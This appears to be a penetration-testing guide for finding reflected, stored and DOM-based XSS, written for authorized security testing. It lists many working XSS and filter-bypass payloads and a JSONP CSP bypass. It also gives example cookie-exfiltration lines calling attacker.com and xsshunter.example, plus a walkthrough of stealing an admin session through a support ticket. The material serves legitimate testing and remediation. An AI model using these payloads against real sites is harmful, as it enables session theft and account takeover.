Testing for XSS Vulnerabilities
When to Use
- Testing web applications for client-side injection vulnerabilities as part of OWASP WSTG testing
- Evaluating the effectiveness of input sanitization and output encoding across all application features
- Assessing the protection provided by Content Security Policy (CSP) headers against XSS exploitation
- Demonstrating the impact of XSS through session hijacking, credential theft, or phishing overlay to stakeholders
- Testing single-page applications (React, Angular, Vue) for DOM-based XSS in client-side routing and rendering
Do not use against applications without written authorization, for deploying persistent XSS payloads that affect real users, or for exfiltrating actual user session tokens from production environments.
Prerequisites
- Authorized scope defining the target web application and acceptable testing activities
- Burp Suite Professional with XSS-focused extensions (XSS Validator, Reflector, Active Scan++)
- Browser with developer tools and XSS testing extensions (HackBar, XSS Hunter)
- XSS Hunter or Burp Collaborator for out-of-band payload verification
- SecLists XSS payload lists and custom payloads for WAF bypass scenarios
Workflow
Step 1: Input and Output Mapping
Map every location where user input enters and is rendered by the application:
- Reflected inputs: Test every URL parameter, search field, error message, and HTTP header value that is reflected in the response
- Stored inputs: Identify features where input is saved and displayed later: user profiles, comments, forum posts, file names, support tickets, and chat messages
- DOM inputs: Identify client-side JavaScript that reads from
location.hash,location.search,document.referrer,window.name,postMessage, orlocalStorageand writes to the DOM - Output context identification: For each reflected input, determine the rendering context:
- HTML body:
<div>USER_INPUT</div> - HTML attribute:
<input value="USER_INPUT"> - JavaScript string:
var x = 'USER_INPUT'; - URL context:
<a href="USER_INPUT"> - CSS context:
<div style="color: USER_INPUT">
- HTML body:
Step 2: Reflected XSS Testing
Test reflected injection points with context-appropriate payloads:
- HTML body context:
<script>alert(document.domain)</script>,<img src=x onerror=alert(1)>,<svg onload=alert(1)> - HTML attribute context:
" onfocus=alert(1) autofocus="," onmouseover=alert(1) ","><script>alert(1)</script> - JavaScript string context:
';alert(1)//,\';alert(1)//,</script><script>alert(1)</script> - URL/href context:
javascript:alert(1),data:text/html,<script>alert(1)</script> - Inside HTML comments:
--><script>alert(1)</script><!-- - Filter bypass payloads (when basic payloads are blocked):
- Case variation:
<ScRiPt>alert(1)</sCrIpT> - Event handlers:
<details open ontoggle=alert(1)> - SVG:
<svg><animate onbegin=alert(1) attributeName=x> - Encoding:
<img src=x onerror=alert(1)>
- Case variation:
Step 3: Stored XSS Testing
Test persistent storage points that render input to other users:
- Submit XSS payloads to every stored input field identified in Step 1
- Use a unique identifier in each payload to track which inputs trigger:
<script>alert('XSS-PROFILE-001')</script> - Check all locations where the stored input is rendered (the same input may appear on multiple pages)
- Test file upload features with HTML files containing JavaScript, SVG files with embedded scripts, and filenames containing XSS payloads
- Test rich text editors by injecting payloads through the raw HTML mode or by manipulating the POST data after the client-side editor sanitizes
- Use XSS Hunter payloads (
"><script src=https://yourxsshunter.xss.ht></script>) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly access
Step 4: DOM-Based XSS Testing
Analyze client-side JavaScript for unsafe DOM manipulation:
- Source identification: Search JavaScript for dangerous sources that read attacker-controlled input:
document.location,document.URL,document.referrerlocation.hash,location.search,location.hrefwindow.name,postMessageevent data
- Sink identification: Search for dangerous sinks that write to the DOM:
innerHTML,outerHTML,document.write(),document.writeln()eval(),setTimeout(),setInterval(),Function()element.setAttribute()with event handlers,jQuery.html(),.append(),v-html(Vue),dangerouslySetInnerHTML(React)
- Trace data flow: Follow the path from source to sink. If user-controlled input reaches a dangerous sink without proper sanitization, DOM XSS exists.
- Framework-specific testing: Test React
dangerouslySetInnerHTML, Angular template injection ({{constructor.constructor('alert(1)')()}}), Vuev-htmldirective
Step 5: CSP Bypass and Advanced Exploitation
Test Content Security Policy effectiveness and demonstrate real-world impact:
- CSP analysis: Review the CSP header for weaknesses:
unsafe-inlinein script-src allows inline scriptsunsafe-evalallows eval() and similar functions- Wildcard domains (
*.googleapis.com) may host JSONP endpoints usable for CSP bypass base-urinot set allows<base>tag injection to redirect relative script loads
- JSONP bypass: If CSP allows a domain with JSONP endpoints, use
<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script> - Impact demonstration:
- Session hijacking:
<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script> - Credential phishing: Inject a fake login form overlay that submits to the attacker's server
- Keylogging: Inject JavaScript that captures keystrokes on the page
- Account takeover: Use XSS to change the victim's email address and trigger a password reset
- Session hijacking:
Key Concepts
| Term | Definition |
|---|---|
| Reflected XSS | Non-persistent XSS where the injected payload is included in the server's response to the same request, requiring the victim to click a crafted URL |
| Stored XSS | Persistent XSS where the payload is saved on the server and served to other users who view the affected page |
| DOM-Based XSS | XSS that occurs entirely in the browser when client-side JavaScript reads attacker-controlled data and writes it to a dangerous DOM sink |
| Content Security Policy | HTTP response header that restricts which sources the browser can load scripts, styles, and other resources from, providing defense-in-depth against XSS |
| Output Encoding | Converting special characters to their HTML entity equivalents (e.g., < to <) to prevent the browser from interpreting user input as code |
| Sink | A JavaScript function or DOM property that can cause code execution or HTML rendering if attacker-controlled data reaches it unsanitized |
Tools & Systems
- Burp Suite Professional: HTTP proxy with active scanning for reflected and stored XSS, plus Repeater and Intruder for manual payload testing
- XSS Hunter: Hosted service that generates payloads which phone home with screenshots, cookies, and DOM content when triggered, essential for blind stored XSS
- DOMPurify: Client-side sanitization library used by developers to prevent XSS; testers should test for bypass techniques against the deployed version
- Browser Developer Tools: Console, Network, and Elements tabs for tracing DOM-based XSS data flows and testing payloads in real-time
Common Scenarios
Scenario: Stored XSS in Customer Support Ticket System
Context: An e-commerce platform has a customer support system where customers submit tickets that are viewed by support agents in an internal admin panel. The ticket submission form accepts HTML formatting.
Approach:
- Submit a support ticket with a unique XSS Hunter payload in the ticket description
- The payload fires when a support agent views the ticket in the admin panel, sending a callback with the agent's session cookie, page DOM, and screenshot
- Use the captured admin session cookie to access the admin panel as the support agent
- From the admin panel, access customer records, order data, and refund functionality
- Document the attack chain: customer submits ticket -> agent views ticket -> XSS fires -> session stolen -> admin panel compromised
- Test if CSP would have prevented the attack (in this case, no CSP header was present)
Pitfalls:
- Only testing for
<script>alert(1)</script>and missing XSS that fires through event handlers or in non-HTML contexts - Not testing stored XSS in features that render to administrative users (support tickets, user profiles viewed by admins)
- Ignoring DOM-based XSS in single-page applications where the server-side code is secure but client-side rendering is vulnerable
- Not checking for XSS in HTTP headers (Referer, User-Agent) that may be logged and rendered in admin dashboards
Output Format
## Finding: Stored XSS in Support Ticket Description
**ID**: XSS-002
**Severity**: High (CVSS 8.1)
**Affected URL**: POST /api/tickets (submission), GET /admin/tickets/8847 (trigger)
**Parameter**: description (POST body)
**XSS Type**: Stored (persistent)
**Description**:
The support ticket description field does not sanitize HTML input before storing
it in the database. When a support agent views the ticket in the admin panel, the
unsanitized HTML is rendered in the agent's browser, allowing arbitrary JavaScript
execution in the context of the admin application.
**Proof of Concept**:
Submitted ticket with payload:
<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">
The payload fired when the agent viewed the ticket, exfiltrating the admin session
cookie to the XSS Hunter server.
**Impact**:
An attacker can steal the session tokens of support agents and administrators,
gaining access to the admin panel with privileges to view customer PII, process
refunds, and modify orders. Affects all 23 support agents who view customer tickets.
**Remediation**:
1. Implement output encoding using a context-aware library (OWASP Java Encoder,
DOMPurify for client-side rendering)
2. Deploy Content Security Policy header:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
3. Set HttpOnly flag on session cookies to prevent JavaScript access
4. Sanitize HTML input server-side using a whitelist approach (allow only safe tags)